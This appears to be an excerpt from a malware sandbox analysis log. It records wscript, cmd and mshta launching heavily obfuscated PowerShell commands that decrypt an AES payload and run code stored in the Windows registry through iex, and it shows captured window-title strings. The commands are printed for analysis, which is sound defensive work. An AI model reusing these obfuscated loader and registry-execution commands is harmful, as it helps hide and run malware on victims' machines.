tiw6l(0x03<#cqs75#>,0x00<#gs7w6#>,0x00<#gtblr#>,0x00<#o3nyw#>); $kzu3x = $null; function s2qwv($ti34n) {invoke-expression -verbose -debug -warningaction inquire 'bqr$bqrebqrlbqrpbqrtbqrfbqr=bqr[bqrsbqrybqrsbqrtbqrebqrmbqr.bqrsbqrebqrcbqrubqrrbqribqrtbqrybqr.bqrcbqrrbqrybqrpbqrtbqrobqrgbqrrbqrabqrpbqrhbqrybqr.bqrabqrebqrsbqr]bqr:bqr:bqrcbqrrbqrebqrabqrtbqrebqr(bqr)bqr;bqr'.replace('bqr', ''); invoke-expression -warningaction inquire -debug -informationaction ignore 'l3m$l3mel3mll3mpl3mtl3mfl3m.l3mml3mol3mdl3mel3m=l3m[l3msl3myl3msl3mtl3mel3mml3m.l3msl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mcl3mrl3myl3mpl3mtl3mol3mgl3mr
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "& {function ib6pi([byte[]]$sf4dz) {invoke-expression -verbose -warningaction inquire -debug 'o2o$o2oco2oqo2o1o2oao2ogo2o=o2o[o2oso2oyo2oso2oto2oeo2omo2o.o2oto2oeo2oxo2oto2o.o2oeo2ono2oco2ooo2odo2oio2ono2ogo2o]o2o:o2o:o2ouo2oto2ofo2o8o2o.o2ogo2oeo2oto2oso2oto2oro2oio2ono2ogo2o(o2o$o2oso2ofo2o4o2odo2ozo2o)o2o'.replace('o2o', ''); return $cq1ag; } function smsgn([byte[]]$tys1w) {invoke-expression -verbose -informationaction ignore 'sti$stirstiwstizstiwstihsti=sti[stibstiistitsticstiostinstivstiestirstitstiestirsti]sti:sti:stitstiostiistinstitsti3sti2sti(sti$stitstiystissti1stiwsti,sti0sti)sti;sti'.replace('sti', ''); return $rwzwh; } $you0b = ib6pi(0x74<#chvvk#>,0x52<#u2cey#>,0x6b<#mvtfn#>,0x58<#yicr7#>,0x43<#k8mg9#>,0x36<#uhqq4#>,0x6a<#cqm2o#>,0x2b<#flcxm#>,0x34<#oy2rt#>,0x5a<#alzz6#>,0x6f<#zokd3#>,0x52<#d4ovl#>,0x59<#slwj0#>,0x62<#zsa1m#>,0x79<#sfoep#>,0x47<#qgvn9#>,0x70<#ks1u4#>,0x6f<#ugj9p#>,0x4d<#kwql0#>,0x45<#emsau#>,0x75<#ov8nf#>,0x6b<#uzpyf#>,0x6b<#xibw9#>,0x43<#hubo7#>,0x59<#ujal4#>,0x46<#zynnj#>,0x42<#jy42r#>,0x51<#wtnpa#>,0x34<#yav4n#>,0x2f<#hv4mn#>,0x46<#nkdcb#>,0x79<#luwsl#>,0x64<#awco3#>,0x34<#cnifi#>,0x58<#uqmod#>,0x4f<#yng7w#>,0x4b<#hebay#>,0x4e<#a4cb9#>,0x58<#f6vnf#>,0x78<#kxgak#>,0x2b<#zmzdt#>,0x45<#e8p88#>,0x67<#zyzgc#>,0x3d<#auma2#>); $pkds6 = ib6pi(0x4e<#hlrgc#>,0x47<#xvisw#>,0x30<#ehfxr#>,0x52<#wp7gt#>,0x63<#cpdce#>,0x50<#ohyle#>,0x37<#xvqhb#>,0x49<#petlw#>,0x36<#lzgm3#>,0x7a<#ttbog#>,0x75<#rxgr0#>,0x45<#ysplk#>,0x65<#qhxnz#>,0x65<#qaxw9#>,0x6f<#w6vt9#>,0x32<#giqig#>,0x46<#ygjpj#>,0x6f<#hp9ri#>,0x77<#dphbh#>,0x72<#kctwk#>,0x34<#x6ppe#>,0x51<#vbwrn#>,0x3d<#rcqfm#>,0x3d<#l7seq#>); $mxwap = ib6pi(0x53<#dbfnz#>,0x6f<#jy4lx#>,0x66<#ez47j#>,0x74<#b1uku#>,0x77<#kcrdo#>,0x61<#gimoz#>,0x72<#muppg#>,0x65<#a0bz2#>,0x5c<#ehl3n#>,0x4d<#zitvl#>,0x69<#smht8#>,0x63<#fjc9s#>,0x72<#hmqwi#>,0x6f<#nkobo#>,0x73<#izfrk#>,0x6f<#j1yat#>,0x66<#dzrc7#>,0x74<#fm5r5#>,0x5c<#rybgp#>,0x57<#t0puw#>,0x69<#vtrqa#>,0x6e<#bhzjx#>,0x64<#mvlqt#>,0x6f<#p5ny6#>,0x77<#dohgt#>,0x73<#sx8cw#>); $rgohu = ib6pi(0x6b<#qlddy#>,0x70<#nhkb5#>,0x44<#zww3k#>,0x53<#envxb#>,0x46<#xm0xt#>); $rwlto = smsgn(0x00<#h5sfv#>,0x00<#ucupc#>,0x00<#mid9v#>,0x00<#hxoxf#>); $ewov8 = $true; $jok5y = $null; function yz1gd($vhgbc) {invoke-expression -warningaction inquire -debug -verbose -informationaction ignore 'cka$ckaeckayckayckaqckahcka=cka[ckasckayckasckatckaeckamcka.ckasckaeckacckauckarckaickatckaycka.ckacckarckayckapckatckaockagckarckaackapckahckaycka.ckaackaeckascka]cka:cka:ckacckarckaeckaackatckaecka(cka)cka'.replace('cka', ''); invoke-expression -warningaction inquire -verbose 'rhv$rhverhvyrhvyrhvqrhvhrhv.rhvmrhvorhvdrhverhv=rhv[rhvsrhvyrhvsrhvtrhverhvmrhv.rhvsrhverhvcrhvurhvrrhvirhvtrhvyrhv.rhvcrhvrrhvyrhvprhvtrhvorhvgrhvrrhvarhvprhvhrhvyrhv.rhvcrhvirhvprhvhrhverhvrrhvmrhvorhvdrhverhv]rhv:rhv:rhvcrhvbrhvcrhv'.replace('rhv', ''); invoke-expression -verbose -d
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "& {function irujv([byte[]]$f9mpx) {invoke-expression -verbose -debug -informationaction ignore 'zzo$zzoszzofzzoyzzoszzo9zzo=zzo[zzoszzoyzzoszzotzzoezzomzzo.zzotzzoezzoxzzotzzo.zzoezzonzzoczzoozzodzzoizzonzzogzzo]zzo:zzo:zzouzzotzzofzzo8zzo.zzogzzoezzotzzoszzotzzorzzoizzonzzogzzo(zzo$zzofzzo9zzomzzopzzoxzzo)zzo'.replace('zzo', ''); return $sfys9; } function ssyta([byte[]]$mydkv) {invoke-expression -warningaction inquire -verbose 'rzw$rzwgrzwwrzw1rzwmrzwhrzw=rzw[rzwbrzwirzwtrzwcrzworzwnrzwvrzwerzwrrzwtrzwerzwrrzw]rzw:rzw:rzwtrzworzwirzwnrzwtrzw3rzw2rzw(rzw$rzwmrzwyrzwdrzwkrzwvrzw,rzw0rzw)rzw;rzw'.replace('rzw', ''); return $gw1mh; } $mxypq = irujv(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxmg = irujv(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gyqop = irujv(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $qr3m4 = irujv(0x4a, 0x6d, 106, 53, 121); $q21ag = irujv(0x67, 0x69, 69, 99, 67); $u2okr = ssyta(0x00, 0, 0, 0x00); $dxs3r = $true; $gns0e = $null; function juypb($gsles) {invoke-expression -debug -warningaction inquire 'fs5$fs5wfs5gfs52fs5gfs5lfs5=fs5[fs5sfs5yfs5sfs5tfs5efs5mfs5.fs5sfs5efs5cfs5ufs5rfs5ifs5tfs5yfs5.fs5cfs5rfs5yfs5pfs5tfs5ofs5gfs5rfs5afs5pfs5hfs5yfs5.fs5afs5efs5sfs5]fs5:fs5:fs5cfs5rfs5efs5afs5tfs5efs5(fs5)fs5'.replace('fs5', ''); invoke-expression -informationaction ignore -warningaction inquire -debug -verbose 'hta$htawhtaghta2htaghtalhta.htamhtaohtadhtaehta=hta[htashtayhtashtathtaehtamhta.htashtaehtachtauhtarhtaihtathtayhta.htachtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htachtaihtaphtahhtaehtarhtamhtaohtadhtaehta]hta:hta:htachtabhtachta'.replace('hta', ''); invoke-expression -debug -informationaction ignore -warningaction inquire 'rly$rlywrlygrly2rlygrlylrly.rlyprlyarlydrlydrlyirlynrlygrly=rly[rlysrlyyrlysrlytrlyerlymrly.rlysrlyerlycrlyurlyrrlyirlytrlyyrly.rlycrlyrrlyyrlyprlytrlyorlygrlyrrlyarlyprlyhrlyyrly.rlyprlyarlydrlydrlyirlynrlygrlymrlyorlydrlyerly]rly:rly:rlyprlykrlycrlysrly7rly'.replace('rly', ''); invoke-expression -warningaction inquire -verbose 'mng$mngwmnggmng2mnggmnglmng.mngkmngemngymng=mng[mngsmngymngsmngtmngemngmmng.mngcmngomngnmngvmngemngrmngtmng]mng:mng:mngfmngrmngomngmmngbmngamngsmngemng6mng4mngsmngtmngrmngimngnmnggmng(mng$mngmmngxmngymngpmngqmng)mng'.replace('mng', ''); invoke-expression -informationaction ignore -warningaction inquire 'bnk$bnkwbnkgbnk2bnkgbnklbnk.bnkibnkvbnk=bnk[bnksbnkybnksbnktbnkebnkmbnk.bnkcbnkobnknbnkvbnkebnkrbnktbnk]bnk:bnk:bnkfbnkrbnkobnkmbnkbbnkabnksbnkebnk6bnk4bnksbnktbnkrbnkibnknbnkgbnk(bnk$bnkl
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" vbscript:execute("d2h=strreverse(""llehs.tpircsw""):set xar=createobject(d2h):xar.run ""powershell.exe -command $r = [microsoft.win32.registry]::currentuser.opensubkey('software\microsoft\windows'); iex $r.getvalue('elnlg')"", 0:close")
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe "c:\windows\system32\mshta.exe" vbscript:execute("d2h=strreverse(""llehs.tpircsw""):set xar=createobject(d2h):xar.run ""powershell.exe -command $r = [microsoft.win32.registry]::currentuser.opensubkey('software\microsoft\windows'); iex $r.getvalue('elnlg')"", 0:close")
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "& {function it93g([byte[]]$e3oxu) {invoke-expression -debug -verbose 'h6m$h6mwh6mhh6mbh6m3h6m2h6m=h6m[h6msh6myh6msh6mth6meh6mmh6m.h6mth6meh6mxh6mth6m.h6meh6mnh6mch6moh6mdh6mih6mnh6mgh6m]h6m:h6m:h6muh6mth6mfh6m8h6m.h6mgh6meh6mth6msh6mth6mrh6mih6mnh6mgh6m(h6m$h6meh6m3h6moh6mxh6muh6m)h6m'.replace('h6m', ''); return $whb32; } function tiw6l([byte[]]$zuv5n) {invoke-expression -debug -warningaction inquire -verbose -informationaction ignore 'dtc$dtcqdtckdtcadtcgdtcidtc=dtc[dtcbdtcidtctdtccdtcodtcndtcvdtcedtcrdtctdtcedtcrdtc]dtc:dtc:dtctdtcodtcidtcndtctdtc3dtc2dtc(dtc$dtczdtcudtcvdtc5dtcndtc,dtc0dtc)dtc;dtc'.replace('dtc', ''); return $qkagi; } $h2oux = it93g(0x74<#agf8g#>,0x52<#sotvh#>,0x6b<#ijtfo#>,0x58<#aq0ez#>,0x43<#lryb0#>,0x36<#ldjca#>,0x6a<#drhtq#>,0x2b<#nxos5#>,0x34<#ajnvw#>,0x5a<#vkssp#>,0x6f<#nr7dj#>,0x52<#lsoi1#>,0x59<#pervd#>,0x62<#tlapz#>,0x79<#kbijz#>,0x47<#hncf5#>,0x70<#hu1xu#>,0x6f<#tuejh#>,0x4d<#cjg0h#>,0x45<#w2r2e#>,0x75<#qkdti#>,0x6b<#ljyd9#>,0x6b<#epinn#>,0x43<#yn4lf#>,0x59<#bh0r2#>,0x46<#bfrbe#>,0x42<#owjkm#>,0x51<#d0ipg#>,0x34<#pgajc#>,0x2f<#oktmn#>,0x46<#k7qw7#>,0x79<#ntwba#>,0x64<#lrwjs#>,0x34<#lp8kk#>,0x58<#gppfr#>,0x4f<#zhqok#>,0x4b<#xlpyw#>,0x4e<#qpxm0#>,0x58<#qdhox#>,0x78<#bubbt#>,0x2b<#gmsca#>,0x45<#csle7#>,0x67<#ldi0e#>,0x3d<#bmxwz#>); $qbags = it93g(0x4e<#c2vu0#>,0x47<#diarv#>,0x30<#mgpf7#>,0x52<#qdmxt#>,0x63<#aesom#>,0x50<#nfqkq#>,0x37<#uwobq#>,0x49<#mq8mb#>,0x36<#z2tts#>,0x7a<#gxc3u#>,0x75<#dzacy#>,0x45<#yjqhj#>,0x65<#drqb2#>,0x65<#tbnzn#>,0x6f<#cek6p#>,0x32<#hvj6e#>,0x46<#ycxzm#>,0x6f<#ywlmr#>,0x77<#ik0cx#>,0x72<#kls1z#>,0x34<#jknpr#>,0x51<#dzexq#>,0x3d<#kaung#>,0x3d<#f40yy#>); $zxcf8 = it93g(0x53<#b0lhd#>,0x6f<#ynhic#>,0x66<#bdsgx#>,0x74<#tossn#>,0x77<#hrywf#>,0x61<#i0n5w#>,0x72<#pudct#>,0x65<#r8glo#>,0x5c<#wrgut#>,0x4d<#lrnzo#>,0x69<#smhlu#>,0x63<#lcpm3#>,0x72<#galvu#>,0x6f<#oapw7#>,0x73<#uiger#>,0x6f<#svdmv#>,0x66<#tmxra#>,0x74<#enrsf#>,0x5c<#qtdsl#>,0x57<#aqua7#>,0x69<#lc02u#>,0x6e<#lgnex#>,0x64<#x9m0b#>,0x6f<#vc3vo#>,0x77<#htgri#>,0x73<#ioy3l#>); $hbkvc = it93g(0x73<#jbcod#>,0x31<#rvfxn#>,0x55<#zawun#>,0x6e<#qhnrl#>,0x62<#ywzwy#>); $b8dta = tiw6l(0x00<#a7hb6#>,0x00<#o0rd9#>,0x00<#jxcyj#>,0x00<#om184#>); $isxcm = tiw6l(0x45<#ood4n#>,0x00<#imgsk#>,0x00<#ylexb#>,0x00<#uuo0e#>); $l8xqf = tiw6l(0x03<#cqs75#>,0x00<#gs7w6#>,0x00<#gtblr#>,0x00<#o3nyw#>); $kzu3x = $null; function s2qwv($ti34n) {invoke-expression -verbose -debug -warningaction inquire 'bqr$bqrebqrlbqrpbqrtbqrfbqr=bqr[bqrsbqrybqrsbqrtbqrebqrmbqr.bqrsbqrebqrcbqrubqrrbqribqrtbqrybqr.bqrcbqrrbqrybqrpbqrtbqrobqrgbqrrbqrabqrpbqrhbqrybqr.bqrabqrebqrsbqr]bqr:bqr:bqrcbqrrbqrebqrabqrtbqrebqr(bqr)bqr;bqr'.replace('bqr', ''); invoke-expression -warningaction inquire -debug -informationaction ignore 'l3m$l3mel3mll3mpl3mtl3mfl3m.l3mml3mol3mdl3mel3m=l3m[l3msl3myl3msl3mtl3mel3mml3m.l3msl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mcl3mrl3myl3mpl3mtl3mol3mgl3Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "& {function ib6pi([byte[]]$sf4dz) {invoke-expression -verbose -warningaction inquire -debug 'o2o$o2oco2oqo2o1o2oao2ogo2o=o2o[o2oso2oyo2oso2oto2oeo2omo2o.o2oto2oeo2oxo2oto2o.o2oeo2ono2oco2ooo2odo2oio2ono2ogo2o]o2o:o2o:o2ouo2oto2ofo2o8o2o.o2ogo2oeo2oto2oso2oto2oro2oio2ono2ogo2o(o2o$o2oso2ofo2o4o2odo2ozo2o)o2o'.replace('o2o', ''); return $cq1ag; } function smsgn([byte[]]$tys1w) {invoke-expression -verbose -informationaction ignore 'sti$stirstiwstizstiwstihsti=sti[stibstiistitsticstiostinstivstiestirstitstiestirsti]sti:sti:stitstiostiistinstitsti3sti2sti(sti$stitstiystissti1stiwsti,sti0sti)sti;sti'.replace('sti', ''); return $rwzwh; } $you0b = ib6pi(0x74<#chvvk#>,0x52<#u2cey#>,0x6b<#mvtfn#>,0x58<#yicr7#>,0x43<#k8mg9#>,0x36<#uhqq4#>,0x6a<#cqm2o#>,0x2b<#flcxm#>,0x34<#oy2rt#>,0x5a<#alzz6#>,0x6f<#zokd3#>,0x52<#d4ovl#>,0x59<#slwj0#>,0x62<#zsa1m#>,0x79<#sfoep#>,0x47<#qgvn9#>,0x70<#ks1u4#>,0x6f<#ugj9p#>,0x4d<#kwql0#>,0x45<#emsau#>,0x75<#ov8nf#>,0x6b<#uzpyf#>,0x6b<#xibw9#>,0x43<#hubo7#>,0x59<#ujal4#>,0x46<#zynnj#>,0x42<#jy42r#>,0x51<#wtnpa#>,0x34<#yav4n#>,0x2f<#hv4mn#>,0x46<#nkdcb#>,0x79<#luwsl#>,0x64<#awco3#>,0x34<#cnifi#>,0x58<#uqmod#>,0x4f<#yng7w#>,0x4b<#hebay#>,0x4e<#a4cb9#>,0x58<#f6vnf#>,0x78<#kxgak#>,0x2b<#zmzdt#>,0x45<#e8p88#>,0x67<#zyzgc#>,0x3d<#auma2#>); $pkds6 = ib6pi(0x4e<#hlrgc#>,0x47<#xvisw#>,0x30<#ehfxr#>,0x52<#wp7gt#>,0x63<#cpdce#>,0x50<#ohyle#>,0x37<#xvqhb#>,0x49<#petlw#>,0x36<#lzgm3#>,0x7a<#ttbog#>,0x75<#rxgr0#>,0x45<#ysplk#>,0x65<#qhxnz#>,0x65<#qaxw9#>,0x6f<#w6vt9#>,0x32<#giqig#>,0x46<#ygjpj#>,0x6f<#hp9ri#>,0x77<#dphbh#>,0x72<#kctwk#>,0x34<#x6ppe#>,0x51<#vbwrn#>,0x3d<#rcqfm#>,0x3d<#l7seq#>); $mxwap = ib6pi(0x53<#dbfnz#>,0x6f<#jy4lx#>,0x66<#ez47j#>,0x74<#b1uku#>,0x77<#kcrdo#>,0x61<#gimoz#>,0x72<#muppg#>,0x65<#a0bz2#>,0x5c<#ehl3n#>,0x4d<#zitvl#>,0x69<#smht8#>,0x63<#fjc9s#>,0x72<#hmqwi#>,0x6f<#nkobo#>,0x73<#izfrk#>,0x6f<#j1yat#>,0x66<#dzrc7#>,0x74<#fm5r5#>,0x5c<#rybgp#>,0x57<#t0puw#>,0x69<#vtrqa#>,0x6e<#bhzjx#>,0x64<#mvlqt#>,0x6f<#p5ny6#>,0x77<#dohgt#>,0x73<#sx8cw#>); $rgohu = ib6pi(0x6b<#qlddy#>,0x70<#nhkb5#>,0x44<#zww3k#>,0x53<#envxb#>,0x46<#xm0xt#>); $rwlto = smsgn(0x00<#h5sfv#>,0x00<#ucupc#>,0x00<#mid9v#>,0x00<#hxoxf#>); $ewov8 = $true; $jok5y = $null; function yz1gd($vhgbc) {invoke-expression -warningaction inquire -debug -verbose -informationaction ignore 'cka$ckaeckayckayckaqckahcka=cka[ckasckayckasckatckaeckamcka.ckasckaeckacckauckarckaickatckaycka.ckacckarckayckapckatckaockagckarckaackapckahckaycka.ckaackaeckascka]cka:cka:ckacckarckaeckaackatckaecka(cka)cka'.replace('cka', ''); invoke-expression -warningaction inquire -verbose 'rhv$rhverhvyrhvyrhvqrhvhrhv.rhvmrhvorhvdrhverhv=rhv[rhvsrhvyrhvsrhvtrhverhvmrhv.rhvsrhverhvcrhvurhvrrhvirhvtrhvyrhv.rhvcrhvrrhvyrhvprhvtrhvorhvgrhvrrhvarhvprhvhrhvyrhv.rhvcrhvirhvprhvhrhverhvrrhvmrhvorhvdrhverhv]rhv:rhv:rhvcrhvbrhvcrhv'.replace('rhv', ''); invoke-expression -verbose -dJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "& {function irujv([byte[]]$f9mpx) {invoke-expression -verbose -debug -informationaction ignore 'zzo$zzoszzofzzoyzzoszzo9zzo=zzo[zzoszzoyzzoszzotzzoezzomzzo.zzotzzoezzoxzzotzzo.zzoezzonzzoczzoozzodzzoizzonzzogzzo]zzo:zzo:zzouzzotzzofzzo8zzo.zzogzzoezzotzzoszzotzzorzzoizzonzzogzzo(zzo$zzofzzo9zzomzzopzzoxzzo)zzo'.replace('zzo', ''); return $sfys9; } function ssyta([byte[]]$mydkv) {invoke-expression -warningaction inquire -verbose 'rzw$rzwgrzwwrzw1rzwmrzwhrzw=rzw[rzwbrzwirzwtrzwcrzworzwnrzwvrzwerzwrrzwtrzwerzwrrzw]rzw:rzw:rzwtrzworzwirzwnrzwtrzw3rzw2rzw(rzw$rzwmrzwyrzwdrzwkrzwvrzw,rzw0rzw)rzw;rzw'.replace('rzw', ''); return $gw1mh; } $mxypq = irujv(0x74, 0x52, 107, 88, 67, 54, 106, 0x2b, 0x34, 90, 0x6f, 82, 0x59, 0x62, 0x79, 0x47, 0x70, 111, 77, 69, 117, 0x6b, 0x6b, 0x43, 89, 0x46, 0x42, 81, 0x34, 47, 70, 121, 0x64, 0x34, 0x58, 79, 0x4b, 0x4e, 0x58, 120, 0x2b, 69, 103, 61); $lsxmg = irujv(0x4e, 0x47, 48, 82, 99, 80, 55, 0x49, 0x36, 122, 0x75, 69, 0x65, 0x65, 0x6f, 0x32, 0x46, 111, 119, 114, 52, 0x51, 0x3d, 0x3d); $gyqop = irujv(0x53, 0x6f, 102, 116, 119, 97, 114, 0x65, 0x5c, 77, 0x69, 99, 0x72, 0x6f, 0x73, 0x6f, 0x66, 116, 92, 87, 105, 0x6e, 0x64, 0x6f, 119, 0x73); $qr3m4 = irujv(0x4a, 0x6d, 106, 53, 121); $q21ag = irujv(0x67, 0x69, 69, 99, 67); $u2okr = ssyta(0x00, 0, 0, 0x00); $dxs3r = $true; $gns0e = $null; function juypb($gsles) {invoke-expression -debug -warningaction inquire 'fs5$fs5wfs5gfs52fs5gfs5lfs5=fs5[fs5sfs5yfs5sfs5tfs5efs5mfs5.fs5sfs5efs5cfs5ufs5rfs5ifs5tfs5yfs5.fs5cfs5rfs5yfs5pfs5tfs5ofs5gfs5rfs5afs5pfs5hfs5yfs5.fs5afs5efs5sfs5]fs5:fs5:fs5cfs5rfs5efs5afs5tfs5efs5(fs5)fs5'.replace('fs5', ''); invoke-expression -informationaction ignore -warningaction inquire -debug -verbose 'hta$htawhtaghta2htaghtalhta.htamhtaohtadhtaehta=hta[htashtayhtashtathtaehtamhta.htashtaehtachtauhtarhtaihtathtayhta.htachtarhtayhtaphtathtaohtaghtarhtaahtaphtahhtayhta.htachtaihtaphtahhtaehtarhtamhtaohtadhtaehta]hta:hta:htachtabhtachta'.replace('hta', ''); invoke-expression -debug -informationaction ignore -warningaction inquire 'rly$rlywrlygrly2rlygrlylrly.rlyprlyarlydrlydrlyirlynrlygrly=rly[rlysrlyyrlysrlytrlyerlymrly.rlysrlyerlycrlyurlyrrlyirlytrlyyrly.rlycrlyrrlyyrlyprlytrlyorlygrlyrrlyarlyprlyhrlyyrly.rlyprlyarlydrlydrlyirlynrlygrlymrlyorlydrlyerly]rly:rly:rlyprlykrlycrlysrly7rly'.replace('rly', ''); invoke-expression -warningaction inquire -verbose 'mng$mngwmnggmng2mnggmnglmng.mngkmngemngymng=mng[mngsmngymngsmngtmngemngmmng.mngcmngomngnmngvmngemngrmngtmng]mng:mng:mngfmngrmngomngmmngbmngamngsmngemng6mng4mngsmngtmngrmngimngnmnggmng(mng$mngmmngxmngymngpmngqmng)mng'.replace('mng', ''); invoke-expression -informationaction ignore -warningaction inquire 'bnk$bnkwbnkgbnk2bnkgbnklbnk.bnkibnkvbnk=bnk[bnksbnkybnksbnktbnkebnkmbnk.bnkcbnkobnknbnkvbnkebnkrbnktbnk]bnk:bnk:bnkfbnkrbnkobnkmbnkbbnkabnksbnkebnk6bnk4bnksbnktbnkrbnkibnknbnkgbnk(bnk$bnklJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe -command "& {function it93g([byte[]]$e3oxu) {invoke-expression -debug -verbose 'h6m$h6mwh6mhh6mbh6m3h6m2h6m=h6m[h6msh6myh6msh6mth6meh6mmh6m.h6mth6meh6mxh6mth6m.h6meh6mnh6mch6moh6mdh6mih6mnh6mgh6m]h6m:h6m:h6muh6mth6mfh6m8h6m.h6mgh6meh6mth6msh6mth6mrh6mih6mnh6mgh6m(h6m$h6meh6m3h6moh6mxh6muh6m)h6m'.replace('h6m', ''); return $whb32; } function tiw6l([byte[]]$zuv5n) {invoke-expression -debug -warningaction inquire -verbose -informationaction ignore 'dtc$dtcqdtckdtcadtcgdtcidtc=dtc[dtcbdtcidtctdtccdtcodtcndtcvdtcedtcrdtctdtcedtcrdtc]dtc:dtc:dtctdtcodtcidtcndtctdtc3dtc2dtc(dtc$dtczdtcudtcvdtc5dtcndtc,dtc0dtc)dtc;dtc'.replace('dtc', ''); return $qkagi; } $h2oux = it93g(0x74<#agf8g#>,0x52<#sotvh#>,0x6b<#ijtfo#>,0x58<#aq0ez#>,0x43<#lryb0#>,0x36<#ldjca#>,0x6a<#drhtq#>,0x2b<#nxos5#>,0x34<#ajnvw#>,0x5a<#vkssp#>,0x6f<#nr7dj#>,0x52<#lsoi1#>,0x59<#pervd#>,0x62<#tlapz#>,0x79<#kbijz#>,0x47<#hncf5#>,0x70<#hu1xu#>,0x6f<#tuejh#>,0x4d<#cjg0h#>,0x45<#w2r2e#>,0x75<#qkdti#>,0x6b<#ljyd9#>,0x6b<#epinn#>,0x43<#yn4lf#>,0x59<#bh0r2#>,0x46<#bfrbe#>,0x42<#owjkm#>,0x51<#d0ipg#>,0x34<#pgajc#>,0x2f<#oktmn#>,0x46<#k7qw7#>,0x79<#ntwba#>,0x64<#lrwjs#>,0x34<#lp8kk#>,0x58<#gppfr#>,0x4f<#zhqok#>,0x4b<#xlpyw#>,0x4e<#qpxm0#>,0x58<#qdhox#>,0x78<#bubbt#>,0x2b<#gmsca#>,0x45<#csle7#>,0x67<#ldi0e#>,0x3d<#bmxwz#>); $qbags = it93g(0x4e<#c2vu0#>,0x47<#diarv#>,0x30<#mgpf7#>,0x52<#qdmxt#>,0x63<#aesom#>,0x50<#nfqkq#>,0x37<#uwobq#>,0x49<#mq8mb#>,0x36<#z2tts#>,0x7a<#gxc3u#>,0x75<#dzacy#>,0x45<#yjqhj#>,0x65<#drqb2#>,0x65<#tbnzn#>,0x6f<#cek6p#>,0x32<#hvj6e#>,0x46<#ycxzm#>,0x6f<#ywlmr#>,0x77<#ik0cx#>,0x72<#kls1z#>,0x34<#jknpr#>,0x51<#dzexq#>,0x3d<#kaung#>,0x3d<#f40yy#>); $zxcf8 = it93g(0x53<#b0lhd#>,0x6f<#ynhic#>,0x66<#bdsgx#>,0x74<#tossn#>,0x77<#hrywf#>,0x61<#i0n5w#>,0x72<#pudct#>,0x65<#r8glo#>,0x5c<#wrgut#>,0x4d<#lrnzo#>,0x69<#smhlu#>,0x63<#lcpm3#>,0x72<#galvu#>,0x6f<#oapw7#>,0x73<#uiger#>,0x6f<#svdmv#>,0x66<#tmxra#>,0x74<#enrsf#>,0x5c<#qtdsl#>,0x57<#aqua7#>,0x69<#lc02u#>,0x6e<#lgnex#>,0x64<#x9m0b#>,0x6f<#vc3vo#>,0x77<#htgri#>,0x73<#ioy3l#>); $hbkvc = it93g(0x73<#jbcod#>,0x31<#rvfxn#>,0x55<#zawun#>,0x6e<#qhnrl#>,0x62<#ywzwy#>); $b8dta = tiw6l(0x00<#a7hb6#>,0x00<#o0rd9#>,0x00<#jxcyj#>,0x00<#om184#>); $isxcm = tiw6l(0x45<#ood4n#>,0x00<#imgsk#>,0x00<#ylexb#>,0x00<#uuo0e#>); $l8xqf = tiw6l(0x03<#cqs75#>,0x00<#gs7w6#>,0x00<#gtblr#>,0x00<#o3nyw#>); $kzu3x = $null; function s2qwv($ti34n) {invoke-expression -verbose -debug -warningaction inquire 'bqr$bqrebqrlbqrpbqrtbqrfbqr=bqr[bqrsbqrybqrsbqrtbqrebqrmbqr.bqrsbqrebqrcbqrubqrrbqribqrtbqrybqr.bqrcbqrrbqrybqrpbqrtbqrobqrgbqrrbqrabqrpbqrhbqrybqr.bqrabqrebqrsbqr]bqr:bqr:bqrcbqrrbqrebqrabqrtbqrebqr(bqr)bqr;bqr'.replace('bqr', ''); invoke-expression -warningaction inquire -debug -informationaction ignore 'l3m$l3mel3mll3mpl3mtl3mfl3m.l3mml3mol3mdl3mel3m=l3m[l3msl3myl3msl3mtl3mel3mml3m.l3msl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mcl3mrl3myl3mpl3mtl3mol3mgl3mrJump to behavior
                      Source: powershell.exe, 00000008.00000002.2591788897.00000225493E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1><br>[<b>Program Manager - 16:38 UTC</b>]</p><br>
                      Source: powershell.exe, 00000006.00000002.1507861844.000001BEE26F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1507861844.000001BEE26FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Active Window Title: Program Manager
